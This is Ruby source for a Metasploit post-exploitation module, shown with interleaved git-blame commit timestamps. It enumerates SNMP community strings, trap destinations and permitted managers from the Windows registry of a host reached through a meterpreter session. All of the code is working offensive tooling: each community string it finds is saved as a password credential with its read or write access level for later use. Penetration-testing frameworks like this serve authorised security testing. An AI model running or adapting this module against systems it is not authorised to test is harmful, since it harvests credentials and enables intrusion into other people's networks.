2011-01-12 23:22:41 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-01-12 23:22:41 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
2012-10-23 18:24:05 +00:00
|
|
|
require 'msf/core/auxiliary/report'
|
2011-01-12 23:22:41 +00:00
|
|
|
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2011-01-12 23:22:41 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Post::Windows::Registry
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Gather SNMP Settings Enumeration (Registry)',
|
|
|
|
'Description' => %q{ This module will enumerate the SNMP service configuration },
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>', 'Tebo <tebo[at]attackresearch.com>'],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
# Run Method called when command run is issued
|
|
|
|
def run
|
|
|
|
print_status("Running module against #{sysinfo['Computer']}")
|
|
|
|
if check_snmp
|
|
|
|
community_strings
|
|
|
|
trap_setup
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Method for Checking if SNMP is installed on the target host
|
|
|
|
def check_snmp
|
|
|
|
print_status("Checking if SNMP is Installed")
|
|
|
|
key = "HKLM\\System\\CurrentControlSet\\Services"
|
|
|
|
if registry_enumkeys(key).include?("SNMP")
|
|
|
|
print_status("\tSNMP is installed!")
|
|
|
|
return true
|
|
|
|
else
|
|
|
|
print_error("\tSNMP is not installed on the target host")
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Method for enumerating the Community Strings configured
|
|
|
|
def community_strings
|
|
|
|
comm_str = []
|
2016-08-10 18:30:09 +00:00
|
|
|
tbl = Rex::Text::Table.new(
|
2014-08-24 14:38:15 +00:00
|
|
|
'Header' => "Community Strings",
|
2013-08-30 21:28:54 +00:00
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' =>
|
|
|
|
[
|
|
|
|
"Name",
|
|
|
|
"Type"
|
|
|
|
])
|
|
|
|
print_status("Enumerating community strings")
|
|
|
|
key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"
|
|
|
|
comm_str = registry_enumvals(key)
|
|
|
|
if not comm_str.nil? and not comm_str.empty?
|
|
|
|
comm_str.each do |c|
|
|
|
|
|
2014-08-24 22:18:31 +00:00
|
|
|
# comm_type is for human display, access_type is passed to the credential
|
|
|
|
# code using labels consistent with the SNMP login scanner
|
2013-08-30 21:28:54 +00:00
|
|
|
case registry_getvaldata(key,c)
|
|
|
|
when 4
|
2014-08-24 14:38:15 +00:00
|
|
|
comm_type = 'READ ONLY'
|
|
|
|
access_type = 'read-only'
|
2013-08-30 21:28:54 +00:00
|
|
|
when 1
|
2014-08-24 14:38:15 +00:00
|
|
|
comm_type = 'DISABLED'
|
|
|
|
access_type = 'disabled'
|
2013-08-30 21:28:54 +00:00
|
|
|
when 2
|
2014-08-24 14:38:15 +00:00
|
|
|
comm_type = 'NOTIFY'
|
|
|
|
access_type = 'notify'
|
2013-08-30 21:28:54 +00:00
|
|
|
when 8
|
2014-08-24 14:38:15 +00:00
|
|
|
comm_type = 'READ & WRITE'
|
|
|
|
access_type = 'read-write'
|
2013-08-30 21:28:54 +00:00
|
|
|
when 16
|
2014-08-24 14:38:15 +00:00
|
|
|
comm_type = 'READ CREATE'
|
|
|
|
access_type = 'read-create'
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Save data to table
|
|
|
|
tbl << [c,comm_type]
|
|
|
|
|
2014-08-24 22:18:31 +00:00
|
|
|
register_creds(session.session_host, 161, '', c, 'snmp', access_type)
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
print_status("")
|
|
|
|
|
|
|
|
# Print table
|
|
|
|
tbl.to_s.each_line do |l|
|
|
|
|
print_status("\t#{l.chomp}")
|
|
|
|
end
|
|
|
|
print_status("")
|
|
|
|
|
|
|
|
# Check who can connect using the Community Strings
|
|
|
|
allowd_for_snmp_query
|
|
|
|
|
|
|
|
else
|
|
|
|
print_error("\tNo Community strings configured")
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Method for enumerating the Traps configured
|
|
|
|
def trap_setup
|
|
|
|
print_status("Enumerating Trap Configuration")
|
|
|
|
key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\TrapConfiguration"
|
|
|
|
trap_hosts = registry_enumkeys(key)
|
|
|
|
if not trap_hosts.nil? and not trap_hosts.empty?
|
|
|
|
trap_hosts.each do |c|
|
|
|
|
print_status("Community Name: #{c}")
|
2014-08-24 14:38:15 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
t_comm_key = key+"\\"+c
|
|
|
|
registry_enumvals(t_comm_key).each do |t|
|
2014-08-24 14:38:15 +00:00
|
|
|
trap_dest = registry_getvaldata(t_comm_key,t)
|
|
|
|
print_status("\tDestination: #{trap_dest}")
|
|
|
|
register_creds(trap_dest, 162, '', c, 'snmptrap', 'trap')
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_status("No Traps are configured")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Method for enumerating Permitted Managers
|
|
|
|
def allowd_for_snmp_query
|
|
|
|
print_status("Enumerating Permitted Managers for Community Strings")
|
|
|
|
key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\PermittedManagers"
|
|
|
|
managers = registry_enumvals(key)
|
|
|
|
if not managers.nil? and not managers.empty?
|
|
|
|
print_status("Community Strings can be accessed from:")
|
|
|
|
managers.each do |m|
|
|
|
|
print_status("\t#{registry_getvaldata(key,m)}")
|
|
|
|
end
|
|
|
|
|
|
|
|
else
|
|
|
|
print_status("\tCommunity Strings can be accessed from any host")
|
|
|
|
end
|
|
|
|
end
|
2014-08-24 14:38:15 +00:00
|
|
|
|
|
|
|
def register_creds(client_ip, client_port, user, pass, service_name, access_type)
|
|
|
|
# Build service information
|
|
|
|
service_data = {
|
|
|
|
address: client_ip,
|
|
|
|
port: client_port,
|
|
|
|
service_name: service_name,
|
|
|
|
protocol: 'udp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
# Build credential information
|
|
|
|
credential_data = {
|
|
|
|
access_level: access_type,
|
|
|
|
origin_type: :session,
|
2014-08-24 22:18:31 +00:00
|
|
|
session_id: session_db_id,
|
2014-08-27 23:34:15 +00:00
|
|
|
post_reference_name: self.refname,
|
2014-08-24 14:38:15 +00:00
|
|
|
private_data: pass,
|
|
|
|
private_type: :password,
|
|
|
|
username: user,
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data.merge!(service_data)
|
|
|
|
credential_core = create_credential(credential_data)
|
|
|
|
|
|
|
|
# Assemble the options hash for creating the Metasploit::Credential::Login object
|
|
|
|
login_data = {
|
|
|
|
core: credential_core,
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
login_data.merge!(service_data)
|
|
|
|
create_credential_login(login_data)
|
|
|
|
end
|
2011-02-25 21:00:33 +00:00
|
|
|
end
|